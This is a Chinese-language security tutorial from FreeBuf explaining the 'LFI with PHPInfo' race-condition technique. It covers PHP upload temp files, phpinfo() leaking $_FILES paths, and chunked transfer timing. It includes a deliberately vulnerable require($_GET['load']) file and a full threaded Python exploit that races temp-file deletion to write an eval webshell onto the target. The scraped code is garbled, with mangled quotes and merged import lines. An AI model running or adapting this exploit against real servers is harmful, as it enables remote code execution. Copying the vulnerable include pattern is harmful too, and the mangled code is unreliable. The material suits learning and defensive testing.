原创作者‍:Drops@ZUT

LFI with PHPInfo是国外研究员在2001年公布的本地文件包含利用方法,作为新手,在国内却找不到完整的学习资料,经过几天的研究学习,把自己的学习过程进行总结,与大家共享。

基础知识

本地文件包含,英文Local File Include,简称LFI。文件包含是一种简化代码、提高代码重用率的方法。但是,由于没有正确处理用户输入,导致本地文件包含漏洞。黑客可以通过漏洞包含非PHP执行文件,如构造包含PHP代码的图片木马、临时文件、session文件、日志等来达到执行PHP代码的目的。

本地文件包含漏洞需要和精心构造的文件结合起来,才能发挥最大威力。这些精心构造的文件包括用户上传的文件、服务器产生的日志、session文件以及PHP程序创建的临时文件等等。尽管可以包含的文件有很多类型,但是也击中了本地文件包含的痛点–无法准确获取文件位置及文件名,只能通过猜测路径、文件名进行漏洞利用,这无疑增加了漏洞的利用难度。

进入LFI with PHPI

相关文件代码:

Phpinfo.php

 <?phpphpinfo();?>

Lfi.php

<?phprequire($_GET[';load';]);?>

下面介绍利用PHPInfo信息进行本地文件包含。【你应该知道的】

一、以上传文件的方式请求任意PHP文件,服务器都会创建临时文件来保存文件内容

在HTTP协议中为了方便进行文件传输,规定了一种基于表单的HTML文件传输方法

<form action="upload_file.php" method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file" /> 
<br />
<input type="submit" name="submit" value="Submit" />
</form>

其中PHP引擎对enctype=”multipart/form-data”这种请求的处理过程如下:

1、请求到达;

2、创建临时文件,并写入上传文件的内容;

3、调用相应PHP脚本进行处理,如校验名称、大小等;

4、删除临时文件。

PHP引擎会首先将文件内容保存到临时文件,然后进行相应的操作。

我们可以对phpinfo.php发起请求,查看服务端变化。由于处理时间极短,我们肉眼无法看到文件夹下临时文件的创建删除过程,可以选择sleep操作延长phpinfo脚本的时间,在慢镜头下,我们看到了生成的临时文件。其中临时文件内容正是我们POST请求中文件内容,临时文件的名称是php+随机数字.tmp,正中本地文件包含痛点。

 


通过刚才的实验,我们发现临时文件的生命周期很短,脚本执行完成后边删除临时文件。我们要做的就是在删除之前包含文件。下面继续。

二、PHPInfo可以输出$_FILES信息,包括临时文件路径、名称

在PHP中,有超全局变量$_FILES,保存上传文件的信息,包括文件名、类型、临时文件名、错误代号、大小。

 

Phpinfo()是一个无比强大的函数,可以输出大量的关于服务器的配置信息,其中包括超全局变量的值。

 

三、分块传输编码

通常,HTTP中的响应消息都是整个发送的,在发送之前知道Content-Lenth值,作为响应头的一部分发送给客户端。

分块传输编码,可以在不知道Content-Lenth情况下,进行分块传输,并把Content-Lenth置为chunked。PHP默认情况,当传输数据大于4KB时,采用分块传输编码。将数据分为一块或多块传输。传输格式是:

每一个非空的块都以该块包含数据的字节数(字节数以十六进制表示)开始,跟随一个CRLF (回车及换行),然后是数据本身,最后块CRLF结束。在一些实现中,块大小和CRLF之间填充有白空格(0x20)。

最后一块是单行,由块大小(0),一些可选的填充白空格,以及CRLF。

 

四、争取时间,在临时文件删除之前执行包含操作

利用PHPInfo进行本地文件包含的主要思想是在临时文件删除前执行操作。

我们需要争取时间,时间差大致来自三个方面:

1、通过分块传输编码,提前获知临时文件名称;

分块传输可以实现在未完全传输完成时即可获知临时文件名,可以尽早发起文件包含请求,赶在删除之前执行代码。

2、通过增加临时文件名后数据长度来延长时间;

通过观察PHPinfo的信息,在$_FILES信息下面,还有请求头的相关信息,我们可以在请求的时候,通过填充大量无用数据,来增加后面数据的长度,从而增加脚本的处理时间,为包含文件争取更多的时间。

3、通过大量请求来延迟PHP脚本的执行速度。

通过大量的并发请求,提高成功的概率。由于对PHP处理性能的不熟悉,做了一个简单的测试,记录大量多个请求下,每个脚本的运行时间,结果如下:

 

通过上面数据,我们可以看到脚本的运行时间有波动,当然其中应该有脚本的等待执行时间,也有很大可能降低了PHP脚本的运行能力,从而延长了时间。

Python代码:

# -*- coding: utf-8 -*-import sysimport socketimport threadingdef setup(host, port):
    ';';';
    初始化HTTP请求数据包
    TAG:校验包含是否成功标志
    PAYLOAD:包含要执行的PHP代码
    padding:增加数据块内容
    LFIREQ:文件包含请求
    REQ_DATA:POST请求数据
    REQ:完整POST请求
    ';';';
    TAG="Security Test"
    PAYLOAD="""%s
<?php
$c=fopen("H:/wamp/tmp/g.php",';w';);
fwrite($c,"<?php eval(';fb';);?>");
?>\r""" % TAG
    padding = "A" * 2000
    LFIREQ = """GET /lfi.php?load=%(file)s HTTP/1.1\r
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36\r
Connection: keep-alive\r
Host: %(host)s\r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r
Upgrade-Insecure-Requests: 1\n
Accept-Encoding: gzip, deflate, sdch\n
\n"""
    REQ_DATA = """------WebKitFormBoundaryIYu6Un7AVVkBR0k6\r
Content-Disposition: form-data; name="file"; filename="shell.php"\r
Content-Type: application/octet-stream\r
\r
%s
------WebKitFormBoundaryIYu6Un7AVVkBR0k6\r
Content-Disposition: form-data; name="submit"\r
\r
Submit
------WebKitFormBoundaryIYu6Un7AVVkBR0k6--\r""" % PAYLOAD
    REQ = """POST /phpinfo.php HTTP/1.1\r
User-Agent: """ + padding + """\r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r
Accept-Language: """ + padding + """\r
Accept-Encoding: gzip, deflate\r
Cache-Control: max-age=0\r
Referer: """ + padding + """\r
Connection: keep-alive\r
Upgrade-Insecure-Requests: 1\r
Host: %(host)s\r
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYu6Un7AVVkBR0k6\r
Content-Length: %(len)s\r
\r
%(data)s""" % {';host';: host, ';len';: len(REQ_DATA), ';data';: REQ_DATA}
    return (REQ, TAG, LFIREQ)
 
 def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
    ';';';
    :param host: 目标主机IP
    :param port: 端口
    :param phpinforeq: 对phpinfo文件的请求
    :param offset: 临时文件名位置
    :param lfireq:文件包含请求
    :param tag: 检测包含成功标志
    :return: 返回完整临时文件名
    ';';';
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s2.connect((host, port))
 
    s.send(phpinforeq)
    d = ""
    while len(d) < offset:
        d += s.recv(offset)
    try:
        i = d.index("[tmp_name] =>")
        fn = d[i+17:i+40]
    except ValueError:
        return None
    s2.send(lfireq % {';file';: fn, ';host';: host})
    d = s2.recv(4096)
    s.close()
    s2.close()
    if d.find(tag) != -1:
        return fn
 
counter = 0class ThreadWorker(threading.Thread):
    ';';';
    线程操作
    maxattempts:最大尝试次数
    ';';';
    def __init__(self, e, l, m, *args):
        threading.Thread.__init__(self)
        self.event = e
        self.lock = l
        self.maxattempts = m
        self.args = args
    def run(self):
        global counter
        while not self.event.is_set():
            with self.lock:
                if counter >= self.maxattempts:
                    return
                counter += 1
            try:
                x = phpInfoLFI(*self.args)
                if self.event.is_set():
                    break
                if x:
                    print "\nGot it! Shell create in H:/wamp/tmp/g.php"
                    self.event.set()
            except socket.error:
                return
 def getOffset(host, port, phpinforeq):
    ';';';
    :param host: 目标主机IP
    :param port: 端口
    :param phpinforeq: 对phpinfo文件的POST请求
    :return:返回临时文件名在返回数据块中的位置
    ';';';
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send(phpinforeq)
    d = ""
    while True:
        i = s.recv(4096)
        d += i
        if i == "":
            break
        if i.endswith("0\r\n\r\n"):
            break
    s.close()
    i = d.find("[tmp_name] =>")
    if i == -1:
        raise ValueError("No php tmp_name in phpinfo output")
    print "found %s at %i" % (d[i:i+10], i)
    return i+256
 def main():
    print "LFI with PHPinfo()"
    if len(sys.argv) < 2:
        print "Usage:%s host [port] [poolsz]" % sys.argv[0]
        sys.exit(1)
    try:
        host = socket.gethostbyname(sys.argv[1])
    except socket.error, e:
        print "Error with hostname %s: %s" % (sys.argv[1], e)
        sys.exit(1)
    port = 80
    try:
        port = int(sys.argv[2])
    except IndexError:
        pass
    except ValueError, e:
        print "Error with port %d: %s" % (sys.argv[2], e)
        sys.exit(1)
    poolsz = 10
    try:
        poolsz = int(sys.argv[3])
    except IndexError:
        pass
    except ValueError, e:
        print "Error with poolsz %d: %s" %(sys.argv[3], e)
        sys.exit(1)
    print "Getting initial offset..."
    phpinforeq, tag, lfireq = setup(host, port)
    offset = getOffset(host, port, phpinforeq)
    sys.stdout.flush()
    maxattempts = 200
    e = threading.Event()
    l = threading.Lock()
 
    print "Spawning worker pool (%d)..." % poolsz
    sys.stdout.flush()
 
    tp = []
    for i in range(0, poolsz):
        tp.append(ThreadWorker(e, l, maxattempts, host, port, phpinforeq, offset, lfireq, tag))
    for t in tp:
        t.start()
    try:
        while not e.wait(1):
            if e.is_set():
                break
            with l:
                sys.stdout.write("\r % 4d / % 4d" % (counter, maxattempts))
                sys.stdout.flush()
                if counter >= maxattempts:
                    break
        if e.is_set():
            print "Woot! \m/"
        else:
            print ":("
    except KeyboardInterrupt:
        print "\nTelling threads to shutdown..."
        e.set()
 
    for t in tp:
        t.join()
 if __name__ == "__main__":
    main()

运行成功示例:

 

心得

在学习过程中,自己了解很多看不太懂的英文资料,验证每一句的真伪,查看配置文件,整个过程没有囫囵吞枣,而是细细的品味每一个细节。Pyhton使用socket发送HTTP请求。总是因为编码格式,导致Bad Request,\r\n让自己头大,但是当自己看到Got it的时候,自己几天的学习,终于有了结果。甚是欣慰!

本次测试只在本地进行测试,在测试过程中,把padding的值设为很小,也能执行成功,最大的尝试次数需要在20以上才能成功。面对不同的网络环境需要设置不同值。

* 作者/Drops@ZUT,属FreeBuf黑客与极客(FreeBuf.COM)原创奖励计划文章,未经许可禁止转载

源链接

Hacking more

...